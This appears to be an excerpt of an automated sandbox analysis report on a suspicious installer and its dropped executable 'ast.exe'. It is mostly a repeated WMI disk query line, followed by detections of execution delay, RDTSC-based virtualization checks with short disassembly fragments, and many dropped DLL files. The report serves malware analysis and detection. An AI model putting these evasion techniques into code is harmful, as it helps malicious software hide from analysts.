                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Tries to delay execution (extensive OutputDebugStringW loop)
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: OutputDebugStringW count: 1841
                          Tries to detect virtualization through RDTSC time measurements
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeRDTSC instruction interceptor: First address: 69B27E second address: 69B284 instructions: 0x00000000 rdtsc 0x00000002 mov edi, edx 0x00000004 mov ebx, eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeRDTSC instruction interceptor: First address: 69B284 second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F824CC64296h 0x00000006 sub eax, ebx 0x00000008 mov dword ptr [ebp-04h], eax 0x0000000b mov ecx, 0000000Ah 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeRDTSC instruction interceptor: First address: 69B294 second address: 69B29A instructions: 0x00000000 rdtsc 0x00000002 mov edi, edx 0x00000004 mov ebx, eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeRDTSC instruction interceptor: First address: 69B29A second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F824CC64296h 0x00000006 sub eax, ebx 0x00000008 cmp eax, dword ptr [ebp-04h] 0x0000000b jnle 00007F824CC642A5h 0x0000000d dec ecx 0x0000000e jne 00007F824CC64289h 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeRDTSC instruction interceptor: First address: 69B29A second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F824CC64296h 0x00000006 sub eax, ebx 0x00000008 cmp eax, dword ptr [ebp-04h] 0x0000000b jnle 00007F824CC642A5h 0x0000000d mov dword ptr [ebp-04h], eax 0x00000010 dec ecx 0x00000011 jne 00007F824CC64289h 0x00000013 rdtsc
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWindow / User API: threadDelayed 3592Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_shfoldr.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\libeay32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-GPS00.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-SNDPS.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-S3CIC.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\astclient.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\libcryptoMD.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-5765H.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-BG0DN.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-16KCC.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_iscrypt.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-JCRD8.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-5FFPK.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\opus.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\libcurl.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\opus.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\msvcr120.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\astrct.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\hatls.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\astclient.dll (copy)Jump to dropped file
